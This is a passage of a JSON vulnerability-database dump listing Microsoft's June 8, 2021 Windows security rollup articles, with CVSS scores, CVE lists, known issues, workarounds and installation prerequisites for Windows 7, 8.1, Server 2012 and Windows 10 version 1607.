"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31962", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003661", "href": "https://support.microsoft.com/en-us/help/5003661", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T09:54:24", "description": "None\n**Important: **Windows 7 and Windows Server 2008 R2 have reached the end of mainstream support and are now in extended support. Starting in January 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 7 and Windows Server 2008 R2 update history [home page](<https://support.microsoft.com/help/4009469>).\n\n## **Improvements and fixes **\n\nThis security update includes improvements and fixes that were a part of update [KB5003233](<https://support.microsoft.com/help/5003233>) (released May 11, 2021) and addresses the following issues: \n\n * Security updates to Windows App Platform and Frameworks, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Remote Desktop, Windows Storage and Filesystems, Windows HTML Platform, and Microsoft Scripting Engine.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom **| **Workaround ** \n---|--- \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fwindows%2Fwin32%2Feventlog%2Fevent-logging-reference&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358267404%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=scGcVremyws4XgZOCym3Xy2QHLHOkKMjyKzcTLfe41g%3D&reserved=0>). You might receive an error when attempting to connect, for example:\n\n * Error 5: access is denied\n * Error 1764: The requested operation is not supported.\n * System.InvalidOperationException,Microsoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fwindows%2Fwin32%2Fetw%2Fevent-tracing-portal&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358267404%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=%2FgfaPm5%2BCISkiVtxX4404eQqQw7laVw1ivdUp7zQujQ%3D&reserved=0>) for [CVE-2021-31958](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fmsrc.microsoft.com%2Fupdate-guide%2Fvulnerability%2FCVE-2021-31958&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358277372%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=KZm29KU3UwieblYgHzatlQXbNEqI9KChC0rR4c3fZaU%3D&reserved=0>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive an error, \"Cannot connect to &lt;Server name&gt;, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer,\u201d and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following: \n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n\n * For Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Note** For Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services.**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The March 12, 2019 servicing stack update (SSU) ([KB4490628](<https://support.microsoft.com/help/4490628>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released September 10, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. For Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.\n 4. To get this security update, you must reinstall the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)) even if you previously installed the ESU key. The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter you install the items above, we strongly recommend that you install the latest SSU ([KB4592510](<https://support.microsoft.com/help/4592510>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003667>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Embedded Standard 7 Service Pack 1, Windows Embedded POSReady 7, Windows Thin PC**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5003667](<https://download.microsoft.com/download/8/b/2/8b25a454-87c9-4ffb-ad6c-81740f1f2b4d/5003667.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003667 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003667", "href": "https://support.microsoft.com/en-us/help/5003667", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T09:54:32", "description": "None\n**Important: **Windows Server 2012 has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional releases (known as \"C\" or \"D\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2012 update history [home page](<https://support.microsoft.com/help/4009471>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003208](<https://support.microsoft.com/help/5003208>) (released previous May 11, 2021) and addresses the following issues:\n\n * Security updates to Windows App Platform and Frameworks, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Storage and Filesystems, Windows HTML Platform, and Microsoft Scripting Engine.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fwindows%2Fwin32%2Feventlog%2Fevent-logging-reference&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358267404%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=scGcVremyws4XgZOCym3Xy2QHLHOkKMjyKzcTLfe41g%3D&reserved=0>). You might receive an error when attempting to connect, for example:\n\n * Error 5: access is denied\n * Error 1764: The requested operation is not supported.\n * System.InvalidOperationException,Microsoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fwindows%2Fwin32%2Fetw%2Fevent-tracing-portal&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358267404%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=%2FgfaPm5%2BCISkiVtxX4404eQqQw7laVw1ivdUp7zQujQ%3D&reserved=0>) for [CVE-2021-31958](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fmsrc.microsoft.com%2Fupdate-guide%2Fvulnerability%2FCVE-2021-31958&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358277372%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=KZm29KU3UwieblYgHzatlQXbNEqI9KChC0rR4c3fZaU%3D&reserved=0>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \n| \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before installing the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001401](<https://support.microsoft.com/help/5001401>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003697>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2012, Windows Embedded 8 Standard**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5003697](<https://download.microsoft.com/download/b/e/b/bebed881-cea5-4ca0-ad97-669e032d5055/5003697.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003697 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003697", "href": "https://support.microsoft.com/en-us/help/5003697", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T09:54:29", "description": "None\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003209](<https://support.microsoft.com/help/5003209>) (released May 11, 2021) and addresses the following issues:\n\n * Security updates to Windows App Platform and Frameworks, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Storage and Filesystems, Windows HTML Platform, and Microsoft Scripting Engine.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fwindows%2Fwin32%2Feventlog%2Fevent-logging-reference&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358267404%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=scGcVremyws4XgZOCym3Xy2QHLHOkKMjyKzcTLfe41g%3D&reserved=0>). You might receive an error when attempting to connect, for example:\n\n * Error 5: access is denied\n * Error 1764: The requested operation is not supported.\n * System.InvalidOperationException,Microsoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fwindows%2Fwin32%2Fetw%2Fevent-tracing-portal&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358267404%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=%2FgfaPm5%2BCISkiVtxX4404eQqQw7laVw1ivdUp7zQujQ%3D&reserved=0>) for [CVE-2021-31958](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fmsrc.microsoft.com%2Fupdate-guide%2Fvulnerability%2FCVE-2021-31958&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358277372%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=KZm29KU3UwieblYgHzatlQXbNEqI9KChC0rR4c3fZaU%3D&reserved=0>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5001403](<https://support.microsoft.com/help/5001403>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003671>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5003671](<https://download.microsoft.com/download/d/f/d/dfd27e6d-f456-4824-9884-3ab7a6c7fcb1/5003671.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003671 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31956", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31962", "CVE-2021-31968", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003671", "href": "https://support.microsoft.com/en-us/help/5003671", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-28T09:54:24", "description": "None\n**EXPIRATION NOTICE**As of 9/12/2023, KB5003638 is no longer available from Windows Update, the Microsoft Update Catalog, or other release channels. We recommend that you update your devices to the latest security quality update. \n--- \n \n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-10-update-servicing-cadence/ba-p/222376>). To view other notes and messages, see the Windows 10, version 1607 update history home page. \n\n## Highlights\n\n * Updates to improve Windows OLE (compound documents) security.\n * Updates for verifying usernames and passwords.\n * Updates for storing and managing files.\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses an issue with the just-in-time (JIT) behavior of **jscript9.dll**.\n * Security updates to the Microsoft Scripting Engine, Windows App Platform and Frameworks, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Virtualization, Windows HTML Platform, and Windows Storage and Filesystems.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://docs.microsoft.com/en-us/windows/win32/eventlog/event-logging-reference>). You might receive an error when attempting to connect, for example:\n\n * error 5: access is denied\n * error 1764: The requested operation is not supported.\n * System.InvalidOperationException, \nMicrosoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://docs.microsoft.com/en-us/windows/win32/etw/event-tracing-portal>) for [CVE-2021-31958](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31958>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **&gt; **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5010359. \n \n## How to get this update\n\nKB5003638 is no longer available.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003638 (OS Build 14393.4467) - EXPIRED", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 